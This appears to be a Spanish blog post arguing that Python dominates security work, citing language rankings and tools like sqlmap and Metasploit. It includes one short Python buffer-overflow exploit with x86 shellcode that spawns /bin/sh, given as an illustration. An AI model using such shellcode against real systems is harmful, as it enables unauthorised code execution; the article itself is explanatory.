Desde hace tiempo Python es el rey de la seguridad informática. Es utilizado por cualquier profesional para realizar cualquier tipo de auditoria. Por otra parte, permite realizar ataques de todo tipo gracias a su sencilla sintaxis, y la gran cantidad de información en la red. ¿Quieres conocer más?

Si exploras diversas páginas web de seguridad informática, verás que las pruebas de concepto están en Python. La mayoría de herramientas para realizar pruebas de seguridad están en Python, permiten su uso para ampliar las funcionalidades. Además permite automatizar tareas de forma sencilla.

¿Qué tiene para ser tan especial?

Entre sus características destaca que es un lenguaje interpretado, es decir, se escribe una única vez y funciona en todas las máquinas que dispongan del intérprete. Tiende a estar instalado en la mayoría de máquinas por defecto. Es decir, una vez atacada casi cualquier tipo de máquina puede ejecutar cualquier código.

Trabaja todo tipo de valores de forma sencilla, y permite ejecutar sencillamente otras herramientas. Un buen ejemplo sería un desbordamiento del buffer en python, en este caso del usuario 0xrick:

import struct
pad = "\x41" * 76
EIP = struct.pack("I", 0xbffff780)
shellcode = "\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
NOP = "\x90" * 100
print pad + EIP + NOP + shellcode

Diversas herramientas disponen algún tipo de interfaz para interactuar con Python. Metasploit permiten escribir plugins directamente es este idioma, e incluso tiene una guía.

¿Pero es tan especial?

Desde los últimos años podemos ver que está en crecimiento. Su crecimiento se refleja en las clasificaciones.

En el ranking TIOBE ha alcanzado el segundo puesto, por debajo de C. En las clasificaciones de StackOverflow de 2019 es el segundo lenguaje más querido y el cuarto más popular. También indican que es el lenguaje que más ha subido, demostrando que es uno de los lenguajes en auge.

Por lo tanto, creo que podemos confirmar que es un lenguaje muy especial.

Ejemplos de uso

Uno de los mayores exponentes es sqlmap. La gran herramienta que nos permite buscar vulnerabilidades SQL de forma automática. Otra gran herramienta es Sparta. Una herramienta para realizar un análisis de la infraestructura tecnológica.

Pero no debemos olvidar el propio lenguaje, potente y sencillo. Se utiliza mucho el azúcar sintáctica. Existen librerías muy potentes, por ejemplo requests para realizar todo tipo de pruebas web.

Conclusión

Después de toda la información arrojada, podemos confirmar que ha venido para quedarse. Irán surgiendo más utilidades y seguirá su expansión en todos los ámbitos.

Aquí dispone de herramientas para pentesting en Python. También hay disponible un curso de Python básico. Es una de los lenguajes que todos debemos conocer, sirve para todo tipo de problemas.

Imagen de TheDigitalWay en Pixabay